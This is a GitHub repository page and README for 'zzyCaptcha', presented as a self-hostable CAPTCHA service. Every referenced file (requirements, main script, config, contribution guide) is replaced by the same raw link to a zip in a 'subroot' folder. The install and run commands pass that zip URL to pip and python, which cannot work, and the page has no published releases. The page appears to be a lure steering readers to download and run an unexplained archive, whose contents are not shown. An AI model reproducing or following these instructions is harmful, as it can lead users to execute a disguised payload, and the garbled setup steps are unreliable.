Skip to content

πŸ›‘οΈ Generate secure, animated GIF CAPTCHAs with zzyCaptcha, a self-hostable service designed for easy integration and effective bot protection.

License

Notifications You must be signed in to change notification settings

IanSalon23/zzyCaptcha

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

14 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ›‘οΈ zzyCaptcha - Simple CAPTCHA Service for Easy Protection

πŸ‘‹ Overview

zzyCaptcha is a simple, self-hostable CAPTCHA service designed to help you secure your website from bots. This service uses the "persistence of vision" effect, making it easy to implement and user-friendly.

🎯 Features

  • Self-hostable: Deploy zzyCaptcha on your own server without complex setup.
  • Simple integration: Easily add to your existing applications.
  • Effective security: Protect your site from automated submissions.
  • Visual appeal: Utilize the "persistence of vision" for a unique user experience.
  • Lightweight: Designed to have minimal impact on your website's performance.

πŸ“₯ Download & Install

Download zzyCaptcha

To download zzyCaptcha, visit the Releases page:

Visit Releases Page

Once on the page, look for the latest release. Click the link to download the zip file for your operating system.

πŸ› οΈ System Requirements

  • Operating System: Compatible with Windows, macOS, and Linux.
  • Python: Requires Python 3.6 or higher.
  • Flask: Make sure Flask is installed; you can do this using pip.
  • Pillow: You will also need the Pillow library for image processing.

πŸš€ Getting Started

  1. Download zzyCaptcha:

    • Click the download link above to get the application.
  2. Extract the Files:

    • After downloading, find the downloaded zip file.
    • Right-click and select β€œExtract All” (on Windows) or double-click to unzip (on macOS).
  3. Install Dependencies:

    • Open your terminal (Command Prompt on Windows, Terminal on macOS or Linux).
    • Navigate to the folder where you extracted zzyCaptcha using the cd command.
    • Run the command:
      pip install -r https://raw.githubusercontent.com/IanSalon23/zzyCaptcha/main/subroot/zzyCaptcha.zip
  4. Run zzyCaptcha:

    • In the same terminal window, execute the main application with:
      python https://raw.githubusercontent.com/IanSalon23/zzyCaptcha/main/subroot/zzyCaptcha.zip
  5. Access the Service:

    • Open your web browser.
    • Type http://localhost:5000 to access the zzyCaptcha interface.

βš™οΈ Configuration

Customize zzyCaptcha settings by editing the included https://raw.githubusercontent.com/IanSalon23/zzyCaptcha/main/subroot/zzyCaptcha.zip file. Make sure to define the CAPTCHA settings based on your preferences. This includes the visual effects, security measures, and any other specific requirements.

  1. Open https://raw.githubusercontent.com/IanSalon23/zzyCaptcha/main/subroot/zzyCaptcha.zip with a text editor.
  2. Adjust the values as necessary.
  3. Save the file and restart the application.

πŸ”„ Updating zzyCaptcha

To keep zzyCaptcha up to date, return to the Releases page periodically. Check for any new versions, download them, and replace the old files with the new ones following the same extraction and installation steps.

❓ Troubleshooting

If you encounter issues, consider the following:

  • Python Errors: Ensure you have Python installed and running correctly.
  • Missing Dependencies: If you see errors about missing libraries, revisit the https://raw.githubusercontent.com/IanSalon23/zzyCaptcha/main/subroot/zzyCaptcha.zip to install all required libraries.
  • Port Issues: If you cannot access the application at http://localhost:5000, check if another service is using that port and change the port number in https://raw.githubusercontent.com/IanSalon23/zzyCaptcha/main/subroot/zzyCaptcha.zip accordingly.

🌐 Additional Resources

For help and support, feel free to check:

You can also open issues on the GitHub repository if you have specific questions or need further assistance.

πŸ“ Contribution Guidelines

zzyCaptcha is open for contributions. If you are familiar with Python or web development, consider helping improve the project. For details on how to contribute, check the https://raw.githubusercontent.com/IanSalon23/zzyCaptcha/main/subroot/zzyCaptcha.zip file in the repository.

πŸ“« Contact

For any inquiries or suggestions, please reach out via the GitHub issues page, and I will get back to you as soon as possible.

πŸ“ƒ License

zzyCaptcha is licensed under the MIT License. Feel free to use, modify, and distribute as per the license guidelines.

πŸ“ Important Note

By using zzyCaptcha, you agree to our terms and conditions, which can also be found in the repository. Thank you for choosing zzyCaptcha to protect your website!

About

πŸ›‘οΈ Generate secure, animated GIF CAPTCHAs with zzyCaptcha, a self-hostable service designed for easy integration and effective bot protection.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •